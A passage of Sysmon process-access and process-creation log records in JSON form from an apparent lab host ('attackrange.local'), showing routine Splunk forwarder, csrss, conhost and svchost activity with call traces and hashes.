C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-00101FDA0300}","TargetProcessId":"3992","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1989,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.188\r\nSourceProcessGUID: {A837DB8D-01C8-5F25-0000-00101FDA0300}\r\nSourceProcessId: 3992\r\nSourceThreadId: 3896\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.188","SourceProcessGUID":"{A837DB8D-01C8-5F25-0000-00101FDA0300}","SourceProcessId":"3992","SourceThreadId":"3896","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1990,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.229\r\nProcessGuid: {A837DB8D-01C9-5F25-0000-0010B8DD0300}\r\nProcessId: 3740\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nParentProcessId: 3736\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.229","ProcessGuid":"{A837DB8D-01C9-5F25-0000-0010B8DD0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-001075BD0300}","ParentProcessId":"3736","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1991,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nSourceProcessId: 3736\r\nSourceThreadId: 3716\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010B8DD0300}\r\nTargetProcessId: 3740\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","SourceProcessId":"3736","SourceThreadId":"3716","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010B8DD0300}","TargetProcessId":"3740","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1992,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010B8DD0300}\r\nTargetProcessId: 3740\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010B8DD0300}","TargetProcessId":"3740","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1993,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1994,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1995,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1996,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1997,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 